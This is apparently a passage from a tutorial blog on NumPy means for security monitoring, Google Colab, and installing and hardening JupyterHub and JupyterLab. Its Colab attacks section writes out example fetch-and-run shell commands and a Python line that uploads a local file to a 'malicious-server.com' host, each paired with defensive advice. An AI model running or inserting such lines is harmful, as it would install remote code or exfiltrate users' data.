print("Average packets per second:", np.mean(packets_per_second)) # Calculate the average (mean) and print it with a descriptive message
```
import numpy as np
packets_per_second = np.array([1000, 50, 100, 120, 500, 115000])
print("Average packets per second:", np.mean(packets_per_second))
```
Cybersecurity – Example 2 (Login Attempts Monitoring)

You can use the np.mean() function to track failed login attempts; hours far above the average might indicate a brute force attack

import numpy as np # Import the NumPy library and give it the alias 'np'
failed_logins = np.array([10, 2, 0, 1, 1, 0,4]) # Create an array of failed login counts per hour
print("Average failed logins per hour:", np.mean(failed_logins)) # Calculate the average (mean) and print it with a descriptive message
```
import numpy as np
failed_logins = np.array([10, 2, 0, 1, 1, 0,4])
print("Average failed logins per hour:", np.mean(failed_logins))
```
Cybersecurity – Example 3 (CPU/Memory Usage Monitoring)

You can use the np.mean() function to track CPU or memory usage; readings far above the average indicate unusual resource usage

import numpy as np # Import the NumPy library and give it the alias 'np'
high_usage = np.array([2, 8, 10, 95, 10]) # Create an array of CPU usage readings (in percent)
print("Average CPU usage:", np.mean(high_usage)) # Calculate the average (mean) and print it with a descriptive message
```
import numpy as np
high_usage = np.array([2, 8, 10, 95, 10])
print("Average CPU usage:", np.mean(high_usage))
```
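The average alone does not say which readings are unusual, so a common next step is to measure how far each value sits from the mean. The sketch below is one possible approach under assumptions, not the method used above: the function name find_spikes and the threshold of 1.5 standard deviations are hypothetical choices, and with so few samples the threshold would need tuning on real data.

```python
import numpy as np

def find_spikes(values, threshold=1.5):
    # Return the values that lie more than `threshold` standard deviations above the mean
    values = np.asarray(values, dtype=float)
    std = values.std()
    if std == 0:
        return values[:0]  # all values are identical, so nothing stands out
    z_scores = (values - values.mean()) / std
    return values[z_scores > threshold]

packets_per_second = np.array([1000, 50, 100, 120, 500, 115000])
failed_logins = np.array([10, 2, 0, 1, 1, 0, 4])
high_usage = np.array([2, 8, 10, 95, 10])

print("Traffic spikes:", find_spikes(packets_per_second))  # [115000.]
print("Login spikes:", find_spikes(failed_logins))         # [10.]
print("CPU spikes:", find_spikes(high_usage))              # [95.]
```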
April 4, 2026
Google Colab
Google Colab

Google Colab (Colaboratory) is a cloud-based, hosted Jupyter Notebook environment provided by Google. It allows users to write and run Python code in a web browser without installing any software locally. Colab is particularly popular for data science, machine learning, and deep learning projects due to its easy access to computing resources, including CPUs, GPUs, and TPUs.

Colab is available in two main tiers:
- Free version: Designed primarily for learning, experimentation, and lightweight projects. Users get access to a basic virtual machine with limited RAM and CPU/GPU resources. Sessions in the free tier have time limits, and resources are allocated dynamically, so performance may vary.
- Paid versions: Targeted at professional or heavy users who need more consistent performance. Paid subscriptions provide faster GPUs, larger RAM allocations, longer runtimes, and priority access to resources, making them suitable for more demanding tasks such as training large machine learning models.
Key features of Google Colab include:
- Interactive coding: Run code cells, visualize outputs, and modify computations in real-time.
- Seamless integration with Google Drive: Save notebooks directly in Drive for easy access and sharing.
- Pre-installed libraries: Popular Python libraries for data analysis, machine learning, and visualization (e.g., NumPy, pandas, Matplotlib, TensorFlow, PyTorch) are already installed.
- Collaboration: Multiple users can work on the same notebook simultaneously, similar to Google Docs.
- Hardware acceleration: Easily switch between CPU, GPU, and TPU for faster computations without complex setup.
Overall, Google Colab provides a flexible, accessible, and collaborative environment for learning, experimentation, and professional projects, making advanced computational resources available to anyone with an internet connection.

You can access the free tier of Google Colab by signing in with your Google account at https://colab.research.google.com/drive/

Colab Security

The security of Google Colab is tied to your Google Account. For example, if you enable two-factor authentication and carefully manage sharing permissions, your notebooks and data are much better protected. However, if your account is compromised or you share notebooks with broad access, others may be able to view or modify your work.

Google Colab Cyberattacks
- Phishing Attack
  - A threat actor sends a phishing email impersonating Google, prompting the recipient to log in to Colab via a fake link.
  - Impact:
    
    If the person falls for it, the threat actor can access their Google Account
    
    The Colab notebooks, Drive files, and connected data are exposed
  - Preventive Measures:
    
    Verify URLs before logging in
    
    Enable two-factor authentication (2FA)
    
    Never enter credentials on suspicious sites
- Credential Stuffing
  - A threat actor uses leaked passwords from other services to attempt to log into someone’s Google Account.
  - Impact:
    
    If the password is reused, the threat actor gains access to Colab notebooks
    
    They can view sensitive datasets, copy or delete notebooks, or run malicious code
  - Preventive Measures:
    
    Use strong, unique passwords for Google Accounts
    
    Enable 2FA
    
    Regularly monitor login activity
- Unauthorized Access via Over-Sharing
  - Someone shares a notebook as “Anyone with the link – Editor”, and a threat actor discovers the link.
  - Impact:
    
    The threat actor can modify the notebook, insert malicious code, or exfiltrate data
    
    Other users who run the notebook may unknowingly execute harmful commands
  - Preventive Measures:
    
    Limit sharing to specific people
    
    Use Viewer or Commenter access when editing isn’t needed
- Malicious Code Injection
  - A threat actor provides a notebook containing malicious commands, which someone runs in Colab, for example !wget https://example.com/script.sh && bash script.sh or !curl -sL https://example.com/script.sh | bash
  - Impact:
    
    The code could install malware or spyware
    
    It might steal data from the mounted Google Drive
    
    It could send sensitive data to external servers
  - Preventive Measures:
    
    Review all code before executing
    
    Avoid running untrusted notebooks, especially shell commands (!)
    
    Mount the drive only when necessary
- Data Exfiltration
  - A threat actor sneaks code into a shared notebook that uploads files from someone’s session to a remote server: requests.post("https://malicious-server.com/upload", files={"file": open("data.csv","rb")})
  - Impact:
    
    Sensitive data, credentials, or IP information may be stolen
    
    The person may not realize the data has been compromised until it’s too late
  - Preventive Measures:
    
    Avoid running unknown scripts
    
    Inspect network calls in notebooks
    
    Clear outputs and restart the runtime before sharing
- Ransomware-Style Attack
  - A threat actor sends a notebook that encrypts files in someone’s mounted Google Drive when executed.
  - Impact:
    
    Access to the files is blocked until a ransom is paid
    
    Data loss or corruption may occur
  - Preventive Measures:
    
    Keep backups of important files
    
    Avoid running notebooks from untrusted sources
    
    Limit Colab access and Drive mounting to trusted notebooks only
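Several of the preventive measures above come down to reading a notebook before running it. As a rough sketch of how that review could be assisted, the following scans the code cells of a notebook (the .ipynb format is JSON) for lines worth a second look. The pattern list, the function name scan_notebook, and the sample notebook are all assumptions for illustration; a match is a prompt for manual review, not proof of malicious intent, and a clean result does not prove a notebook is safe.

```python
import re

# Hypothetical patterns worth a second look; this list is illustrative, not complete.
SUSPICIOUS_PATTERNS = {
    "shell or magic command": re.compile(r"^\s*[!%]"),
    "pipe to shell": re.compile(r"\|\s*(bash|sh)\b"),
    "outbound upload": re.compile(r"requests\.(post|put)\s*\("),
    "Drive mount": re.compile(r"drive\.mount\s*\("),
}

def scan_notebook(notebook):
    """Return (cell_index, label, line) for each code line matching a pattern."""
    findings = []
    for index, cell in enumerate(notebook.get("cells", [])):
        if cell.get("cell_type") != "code":
            continue
        source = cell.get("source", [])
        # .ipynb files store the source as a list of lines or as a single string
        text = "".join(source) if isinstance(source, list) else source
        for line in text.splitlines():
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    findings.append((index, label, line.strip()))
    return findings

# A tiny in-memory notebook standing in for a shared .ipynb file loaded with json.load()
sample = {
    "cells": [
        {"cell_type": "markdown", "source": ["# Demo"]},
        {"cell_type": "code", "source": ["print('hello')\n"]},
        {"cell_type": "code", "source": ["!curl -sL https://example.com/script.sh | bash\n"]},
    ]
}

for cell_index, label, line in scan_notebook(sample):
    print(f"cell {cell_index}: {label}: {line}")
```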
Create a Notebook

After logging in, click New Notebook, or go to File and then New Notebook.

Rename the Notebook

You can rename the notebook by left-clicking its name.

Execute Python Code

In the top-left corner, the + Code button adds a code cell to the interactive document. Each code cell has a run button with a right-arrow symbol. Type print("Hello world") and click that arrow.

Result

Wrapping Output Text

If you want the output text to be wrapped, execute the following as code in the first cell

from IPython.display import HTML, display # Imports the HTML display tools: HTML() lets you write HTML/CSS and display() renders it in the notebook
def css(): # Defines a function that injects the CSS
  display(HTML('''<style>pre {white-space: pre-wrap;}</style>''')) # Injects CSS so that all <pre> blocks (text output) wrap long lines instead of scrolling horizontally
get_ipython().events.register('pre_run_cell', css) # Registers the function so the CSS is applied automatically before every cell runs
```
from IPython.display import HTML, display

def css():
  display(HTML('''<style>pre {white-space: pre-wrap;}</style>'''))

get_ipython().events.register('pre_run_cell', css)
```
Result

Colab Virtual Instance IP

Colab virtual instances (containers) are connected to the internet. You can look up the instance's public IP address as follows:

from requests import get # Imports the get function from the requests library to make HTTP requests
ip = get('https://api.ipify.org').content.decode('utf8') # Sends a request to api.ipify.org, a service that returns your public IP as plain text, and decodes the response bytes into a string
print("Public IP is: ", ip) # Prints your public IP in a readable format
```
from requests import get
ip = get('https://api.ipify.org').content.decode('utf8')
print("Public IP is: ", ip)
```
Result

Colab Processes

You can list the current processes using the psutil module

import psutil # Imports the psutil library, which is used for system monitoring (CPU, memory, processes)
for proc in psutil.process_iter(['name']): # Loops through all running processes, fetching each process name up front so a process that exits mid-loop does not raise an error
    print(proc.info['name']) # Prints each process name
```
import psutil
for proc in psutil.process_iter(['name']):
    print(proc.info['name'])
```
Result

Colab Extensions

Colab extensions are extra tools or add-ons that extend Google Colab's functionality beyond its default features. They help you work faster, explore data more easily, and customize your notebook experience. For example, google.colab.data_table is a Colab module that displays pandas DataFrames as interactive tables inside a notebook (some Colab extensions are already loaded in the notebook by default).

%load_ext google.colab.data_table # Load the Colab extension that displays DataFrames as interactive tables

import pandas as pd # Import the pandas library for data manipulation
import numpy as np # Import the NumPy library for numerical operations

data = { # Create a dictionary with sample data
    'Name': ['John', 'Jane', 'Joe'], # List of names
    'Sales': [25, 30, 35], # List of corresponding sales numbers
    'City': ['New York', 'Los Angeles', 'Houston'] # List of corresponding cities
}

df = pd.DataFrame(data) # Convert the dictionary to a pandas DataFrame
df.to_csv('dummy_data.csv', index=False) # Save the DataFrame to a CSV file without the index column
df # Display the DataFrame in the notebook
```
%load_ext google.colab.data_table

import pandas as pd
import numpy as np

data = {
    'Name': ['John', 'Jane', 'Joe'],
    'Sales': [25, 30, 35],
    'City': ['New York', 'Los Angeles', 'Houston']
}

df = pd.DataFrame(data)
df.to_csv('dummy_data.csv', index=False)
df
```
Result

Colab Environment Variables

To securely access saved secrets (like API keys) in Google Colab without putting them directly in your code, use google.colab.userdata. It helps protect sensitive information when sharing notebooks.

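After you add a secret in the Secrets panel (the key icon in the left sidebar) and grant the notebook access to it, userdata.get() returns its value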
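As a minimal sketch of reading a secret without hard-coding it, the helper below calls userdata.get() when it runs inside Colab and falls back to an environment variable elsewhere. The fallback, the helper names read_secret and mask, and the secret name DEMO_API_KEY are assumptions for illustration. Inside Colab, a secret with that name must exist and the notebook must be granted access to it; otherwise userdata.get() raises an error.

```python
import os

def read_secret(name):
    """Read a secret from Colab's Secrets panel, or from an environment variable elsewhere."""
    try:
        from google.colab import userdata  # available only inside Colab
    except ImportError:
        return os.environ.get(name)  # fallback outside Colab (an assumption of this sketch)
    return userdata.get(name)

def mask(value, visible=4):
    """Hide the secret in output, showing at most the last few characters."""
    if not value:
        return "<not set>"
    if len(value) <= visible:
        return "*" * len(value)
    return "*" * (len(value) - visible) + value[-visible:]

os.environ.setdefault("DEMO_API_KEY", "sk-demo-123456")  # placeholder value for the demo only
print("DEMO_API_KEY:", mask(read_secret("DEMO_API_KEY")))
```

Masking the value before printing keeps the secret out of saved cell outputs, which matters because outputs travel with a shared notebook.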
March 30, 2026
JupyterHub

JupyterHub is an open-source platform that provides multi-user access to Jupyter Notebook or JupyterLab environments. While JupyterLab or the single-user Jupyter Notebook server is suitable for individual users, JupyterHub is ideal for educational institutions, research groups, or organizations that need multiple users to have their own interactive computing environments on a shared server. Each user gets a personal, isolated instance of a Jupyter Notebook or JupyterLab server, while administrators can centrally manage authentication, resource allocation, and access control.

JupyterHub supports a variety of authentication methods, including OAuth, LDAP, GitHub, and custom systems, making it flexible for different organizational needs. It can be deployed on a single server or scaled across cloud infrastructure or high-performance computing clusters, allowing dozens or even hundreds of users to run notebooks simultaneously.

Security is a critical concern for JupyterHub deployments. Because it exposes interactive coding environments over a network, improper configuration can allow threat actors to exploit vulnerabilities, gain unauthorized access, or use the server for malicious activities, such as launching attacks or mining cryptocurrencies. To mitigate risks, administrators should enforce strong authentication, HTTPS encryption, firewall rules, and regular updates.

Key features of JupyterHub include:
- Multi-user management: Centralized control over multiple notebook instances.
- Customizable environments: Each user can have their own libraries and resources without affecting others.
- Scalability: Can run on local servers, cloud platforms, or containerized systems like Docker or Kubernetes.
- Integration with JupyterLab: Users can work in the modern JupyterLab interface while administrators manage the backend infrastructure.
Overall, JupyterHub provides a secure, scalable, and collaborative platform for teams or classrooms that need interactive computing environments, but it requires careful setup to maintain security and reliability.

Installing JupyterHub on Ubuntu Server

We will be installing The Littlest JupyterHub (TLJH), a JupyterHub distribution for a single server, in the Ubuntu Server VM. The installation process takes ~5-10 minutes to finish.
1. Set up Ubuntu Server in a VM
2. Go to the terminal and run
  1. sudo apt install python3 python3-dev git curl
  2. curl -L https://tljh.jupyter.org/bootstrap.py | sudo -E python3 - --admin admin
3. Verify that JupyterHub is working by running sudo lsof -i :80 in the terminal
4. Open your web browser and go to http://127.0.0.1 (or the VM's IP address if you are browsing from another machine)
5. Enter admin as the username and type any strong password you would like to use
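The verification step can also be scripted. As a small sketch, the following checks whether something accepts TCP connections on port 80, which is where the steps above expect JupyterHub to listen. The function name is_port_open is an assumption for illustration, and the check only confirms that a service is listening, not that the service is JupyterHub.

```python
import socket

def is_port_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# 127.0.0.1 and port 80 match a local install; replace the host with the VM's IP if checking remotely
print("JupyterHub port reachable:", is_port_open("127.0.0.1", 80))
```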
Hardening JupyterHub (Latest Software Version)

We installed JupyterHub from the project's website using a bootstrap script. The script pulls the latest version of JupyterHub and installs it for us. When installing software, always make sure it comes from a trusted source. If you install software manually, verify its integrity using checksums.
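Checking integrity with a checksum means hashing the downloaded file and comparing the result with the value published by the software's maintainers. A minimal sketch of that comparison using SHA-256 follows; the function names and the throwaway demo file are assumptions for illustration, and in practice the expected value comes from the publisher rather than being computed locally.

```python
import hashlib
import hmac
import os
import tempfile

def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large downloads do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def matches_checksum(path, expected_hex):
    """Compare the file's SHA-256 digest with the expected hexadecimal value."""
    return hmac.compare_digest(sha256_of_file(path), expected_hex.strip().lower())

# Demo with a throwaway file standing in for a downloaded installer
data = b"example installer contents"
with tempfile.NamedTemporaryFile(delete=False) as handle:
    handle.write(data)
    demo_path = handle.name

published = hashlib.sha256(data).hexdigest()  # stand-in for the publisher's checksum
print("Checksum matches:", matches_checksum(demo_path, published))
print("Mismatch detected:", not matches_checksum(demo_path, "0" * 64))
os.remove(demo_path)
```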

Type server_ip/hub/admin# in the web browser

Check that the software version shown on the admin page matches the latest version listed on the pip (PyPI) website

To update to the latest version, you can run this command in the terminal (Do not run this in JupyterHub)

curl # Command-line tool used to download data from a URL
-L # Tells curl to follow redirects (the URL may redirect to another location)
https://tljh.jupyter.org/bootstrap.py # The URL of the bootstrap installer script for The Littlest JupyterHub (TLJH)
| # Pipe: sends the downloaded script directly to another command instead of saving it to a file
sudo # Runs the next command with administrator (root) privileges, required to install system services and packages
python3 # Uses the system's Python 3 interpreter to execute the script
- # Tells Python to read the script from standard input (stdin), i.e., from the pipe
--version=latest # Argument passed to bootstrap.py, instructing it to install the latest TLJH release
```
(VM) $ curl -L https://tljh.jupyter.org/bootstrap.py | sudo python3 - --version=latest
```
Hardening JupyterHub Server (Change default credentials or adding regular users)

Type server_ip/hub/admin# in the web browser. If you used default usernames and passwords, you can change them from here (Remember, do not use default usernames and passwords in production environments – You can have default credentials in testing environments, but not production environments).

You can also manage users with tljh-config. For example, to grant a user admin privileges:

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
add-item # A subcommand that adds a value to a list-type configuration setting.
users.admin # The configuration key that stores the list of JupyterHub admin users.
<username> # The Linux/JupyterHub username you want to grant admin privileges to (replace this with the actual username).
```
(VM) $ sudo tljh-config add-item users.admin <username>
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
Or, you can remove a user's admin privileges

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
remove-item # A subcommand that removes a value from a list-type configuration setting.
users.admin # The configuration key that stores the list of JupyterHub admin users.
<username> # The Linux/JupyterHub username whose admin privileges you want to remove (replace this with the actual username).
```
(VM) $ sudo tljh-config remove-item users.admin <username>
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
Hardening JupyterHub (Disabling Features)

To disable access to the terminal (this does not disable magic commands, so threat actors can still use them):

Generate jupyter_notebook_config.py and move it to /opt/tljh/user/etc/jupyter

/opt/tljh/user/bin/jupyter # The Jupyter executable from TLJH's user Python environment (not the system Python).
notebook # Runs the classic Jupyter Notebook application (not JupyterLab).
--generate-config # Tells Jupyter to create a default configuration file and then exit.
```
(VM) $ /opt/tljh/user/bin/jupyter notebook --generate-config
Writing default config to: /home/<change this to the current username>/.jupyter/jupyter_notebook_config.py
```
sudo # Runs the command with administrator (root) privileges because you are moving a file into a system-managed directory.
mv # The Linux command to move or rename files.
/home/<username>/.jupyter/jupyter_notebook_config.py # The source file: a Jupyter Notebook configuration file generated earlier.
/opt/tljh/user/etc/jupyter/ # The destination directory for TLJH-managed Jupyter configuration.
```
(VM) $ sudo mv /home/test/.jupyter/jupyter_notebook_config.py /opt/tljh/user/etc/jupyter/
```
After that, uncomment the setting by changing #c.ServerApp.terminals_enabled = False to c.ServerApp.terminals_enabled = False in the moved file /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py

sudo # Runs the command with administrator (root) privileges because you are editing a file in a system-managed directory.
nano # A simple command-line text editor in Linux.
/opt/tljh/user/etc/jupyter/jupyter_notebook_config.py # The system-wide Jupyter Notebook configuration file for TLJH
```
(VM) $ sudo nano /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py
```
Reload JupyterHub

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
The terminal option is now removed from the interface

Hardening JupyterHub (Enabling HTTPS)

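We will use a self-signed certificate for HTTPS, generated with the openssl command

sudo # Runs the command with administrator privileges, necessary because /etc is a system directory
mkdir # Linux command to create a new directory (folder).
/etc/https # The path for the new directory you want to create.
```
(VM) $ sudo mkdir /etc/https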
```
cd # Linux command to change the current directory in the terminal.
/etc/https # The path to the directory you want to switch to.
```
(VM) $ cd /etc/https
```
sudo # Runs the command with administrator privileges, necessary because you’re creating files in a system directory (/etc/https)
openssl # The OpenSSL tool, used to generate SSL/TLS certificates, keys, and handle encryption.
req # Command to create a certificate signing request (CSR) or self-signed certificate.
-x509 # Creates a self-signed certificate instead of generating a CSR to send to a certificate authority.
-newkey rsa:4096 # Generates a new RSA key pair with 4096-bit encryption.
-keyout key.pem # Specifies the filename for the private key.
-out cert.pem # Specifies the filename for the certificate itself.
-sha256 # Uses the SHA-256 hash algorithm for signing the certificate.
-days 3650 # Sets the certificate validity to 3650 days (~10 years).
-nodes # Stands for “no DES” — the private key will not be encrypted with a passphrase. Needed for services that start automatically, like JupyterHub, so you don’t have to type a password on startup.
-subj "/C=US/ST=Washington/L=Vancouver/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname" # Provides certificate details in a single line: C: Country (US), ST: State (Washington), L: City (Vancouver), O: Organization (CompanyName), OU: Organizational Unit (CompanySectionName), CN: Common Name or Hostname (e.g., example.com or your server IP)
```
(VM) $ sudo openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=US/ST=Washington/L=Vancouver/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"
```
sudo # Runs the command with administrator privileges. Needed because /etc/https is a system directory.
chown # Linux command to change the ownership of files and directories.
root # Specifies the new owner.
-R # Stands for recursive. Applies the ownership change to all files and subdirectories inside /etc/https.
/etc/https # The directory to change ownership for (and everything inside it).
```
(VM) $ sudo chown root -R /etc/https
```
sudo # Runs the command with administrator privileges because /etc/https is a system directory.
chmod # Linux command to change file permissions.
0600 # Permission mode in octal format. Only root can read/write the files; nobody else can access them: Owner (root) → read & write (6), Group → no permissions (0), Others → no permissions (0)
-R # Stands for recursive. Applies permissions to all files and subdirectories under /etc/https.
/etc/https # The directory being modified, containing your SSL certificate and private key
```
(VM) $ sudo chmod 0600 -R /etc/https
```
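After tightening permissions, it can be worth confirming that the private key is not readable by group or other users. The following is a minimal sketch of such a check; the function name is_owner_only is an assumption for illustration, and the paths are the ones used in the commands above. Because the directory itself is restricted, the script needs to run as root to inspect the files; otherwise it reports that the path could not be checked.

```python
import os
import stat

def is_owner_only(path):
    """Return True if group and others have no permissions on the file."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0

for path in ("/etc/https/key.pem", "/etc/https/cert.pem"):
    try:
        print(path, "owner-only:", is_owner_only(path))
    except OSError as error:
        # Covers a missing file as well as insufficient privileges
        print(path, "could not be checked:", error.strerror)
```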
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.tls.key # The configuration key specifying the path to the TLS private key for HTTPS.
/etc/https/key.pem # The path to the private key file you generated earlier. This file must be readable by root, which it is, because of chmod 600
```
(VM) $ sudo tljh-config set https.tls.key /etc/https/key.pem
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.tls.cert # The configuration key specifying the path to the TLS certificate for HTTPS
/etc/https/cert.pem # The path to your SSL certificate file you generated earlier. This file must be readable by root, which it is, because of chmod 600
```
(VM) $ sudo tljh-config set https.tls.cert /etc/https/cert.pem
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.enabled # The TLJH configuration key that turns HTTPS on or off
true # Sets the value of https.enabled to true, enabling HTTPS for JupyterHub
```
(VM) $ sudo tljh-config set https.enabled true
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
proxy # Specifies that only the reverse proxy service should be reloaded
```
(VM) $ sudo tljh-config reload proxy
```
Type https:// followed by the IP address of the JupyterHub server in the web browser and create an exception for the self-signed certificate
March 29, 2026
JupyterLab

JupyterLab is an open-source web-based interactive development environment primarily used for data science, scientific computing, and machine learning. It allows users to create and manage interactive documents that combine live code, visualizations, equations, and narrative text in a single workspace. These documents are saved with the .ipynb extension, which stands for IPython Notebook, reflecting its origins in the IPython project.

Unlike traditional text editors or IDEs, JupyterLab provides a highly flexible interface that lets users open multiple notebooks, terminals, text files, and data viewers simultaneously in tabs or split screens. It supports numerous programming languages, with Python being the most common, and offers extensive integration with libraries for data analysis, plotting, and machine learning, such as NumPy, pandas, Matplotlib, and TensorFlow.

Key features of JupyterLab include:
- Interactive code execution: Run code in real-time, see outputs immediately, and modify code cells independently.
- Rich media support: Embed images, videos, interactive plots, and LaTeX equations directly within notebooks.
- Extensible interface: Customize the environment with extensions like version control, debugging tools, or additional language kernels.
- Collaboration and sharing: Notebooks can be shared with others, exported to multiple formats (HTML, PDF, Markdown), or run on cloud platforms like Google Colab or Binder.
Overall, JupyterLab is a powerful tool for data exploration, analysis, and presentation, combining code execution and documentation into a single cohesive platform.

Installing JupyterLab on Windows
1. Install Python (make sure to check the Add Python X to PATH box in the installation window)
2. Go to the CMD and install jupyterlab using pip install jupyterlab
Installing JupyterLab on Linux-based OS (Ubuntu)
1. Go to the terminal
  1. Install Python using sudo apt-get install python3
  2. Install pip using sudo apt-get install python3-pip
  3. Install jupyterlab using pip3 install jupyterlab
Installing JupyterLab on MacOS
1. Go to the terminal
  1. Install jupyterlab using pip3 install jupyterlab
In some operating systems, such as Windows, the pip command is aliased to pip3.

Alternatives

*If you are having issues installing JupyterLab, use Visual Studio Code or any other environment that supports Jupyter notebooks
- Jupyter Notebooks in VS Code
Running JupyterLab

You can start the interactive interface with the jupyter command in the terminal or command-line interpreter. That command takes different subcommands, and the one we will use is lab (you may need to elevate privileges). You may need to close the terminal or CMD and open it again before running jupyter lab, because the installation adds new environment variables and reopening the terminal is the easiest way to refresh them.

jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
```
(Host) jupyter lab
```
or

python # Starts the Python interpreter
-m # Tells Python to run a module as a script, instead of running a .py file
jupyterlab # The name of the Python module being executed
```
(Host) python -m jupyterlab
...
...
...
[C 2023-09-23 13:06:53.906 ServerApp] 
 
    To access the server, open this file in a browser:
        file:///Users/pc/Library/Jupyter/runtime/jpserver-5633-open.html
    Or copy and paste one of these URLs:
        http://localhost:8889/lab
        http://127.0.0.1:8889/lab
```
The browser will open and show the interactive interface. If the browser does not open automatically, open it yourself and go to one of the URLs shown in the terminal or command-line interpreter.

Create a Jupyter Notebook

You can create a notebook by clicking on File, then New, then Notebook. Or, you can click on the following icon

You can change the newly created file name by right-clicking on the file tab, then Rename Notebook

In the notebook file, make sure that code is selected and type print("test")

To execute the code, click the play icon; your code will run, and the result is shown in the next line. You can re-execute this block as many times as you want

Magic Commands

Also known as magic functions, these are special commands that extend the notebook's capabilities by changing how a line or cell is run. Some of them allow users to escape the Python interpreter. For example, you can run a shell command and capture its output by placing the ! character before the command. This is helpful when the user is limited to the notebook interface.

If you run the whoami command on its own, it will fail because it is interpreted as Python code

If you prefix it with the ! character (that is, !whoami), it runs as a shell command and prints the current username
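The ! prefix only works inside a notebook. As a rough sketch of the same idea in plain Python, the standard subprocess module can run a command and capture its output. The helper name run_command is an assumption for illustration, and the example skips quietly if whoami is not available on the system.

```python
import shutil
import subprocess

def run_command(args):
    """Run a command without a shell and return its trimmed standard output."""
    completed = subprocess.run(args, capture_output=True, text=True, check=False)
    return completed.stdout.strip()

if shutil.which("whoami"):  # skip quietly if the command is not installed
    print("Current user:", run_command(["whoami"]))
```

Passing the command as a list avoids invoking a shell, so the arguments are not subject to shell expansion.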

Shutting down JupyterLab

You can shut down JupyterLab from the terminal or command-line interpreter by pressing Ctrl+C, or from the interface by going to File, then Shut Down

Setting up Password

You can configure a password for JupyterLab that must be entered before a user can access the interface, ensuring secure access to the environment

jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
password # Option to setup/change password
```
(Host) jupyter lab password
Enter password: 
Verify password: 
[JupyterPasswordApp] Wrote hashed password to /Users/user/.jupyter/jupyter_server_config.json
```
jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
```
(Host) jupyter lab
...
...
...
[C 2023-09-23 13:06:53.906 ServerApp] 
 
    To access the server, open this file in a browser:
        file:///Users/pc/Library/Jupyter/runtime/jpserver-5633-open.html
    Or copy and paste one of these URLs:
        http://localhost:8889/lab
        http://127.0.0.1:8889/lab
```
External Modules

The following are some of the external modules used in data analysis and visualization
- numpy – a library for large multidimensional arrays
- pandas – a library for data analysis
- matplotlib – a library for creating interactive visualizations
Install Modules

You can install all the modules using the install command of pip

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python's package manager
install # A command to download and install libraries from PyPI (the Python Package Index)
numpy # Library for numerical computing, arrays, and matrices.
pandas # Library for data manipulation and analysis, especially tabular data.
matplotlib # Library for creating plots and visualizations in Python.
beautifulsoup4 # Library for parsing HTML and XML, often used in web scraping.
lxml # Library for fast XML and HTML parsing, used by BeautifulSoup for speed and reliability.
selenium # Library for automating web browsers, often used for testing or web scraping dynamic websites.
webdriver-manager # Library to automatically download and manage browser drivers for Selenium, like ChromeDriver or GeckoDriver.
```
!pip install numpy pandas matplotlib beautifulsoup4 lxml selenium webdriver-manager
```
Review Modules

You can review all installed modules using the list command of pip

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python’s package manager
list # A command to list all installed packages
```
!pip list
```
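To check a few specific packages from Python rather than reading the full pip list output, the standard importlib.metadata module can report installed versions. This is a small sketch; the function name installed_version is an assumption for illustration, and the package names are the ones listed under External Modules.

```python
from importlib import metadata

def installed_version(package):
    """Return the installed version of a package, or None if it is not installed."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None

for name in ("numpy", "pandas", "matplotlib"):
    version = installed_version(name)
    print(name, version if version else "not installed")
```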
Remove Modules

You can remove any module using the uninstall command of pip

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python's package manager
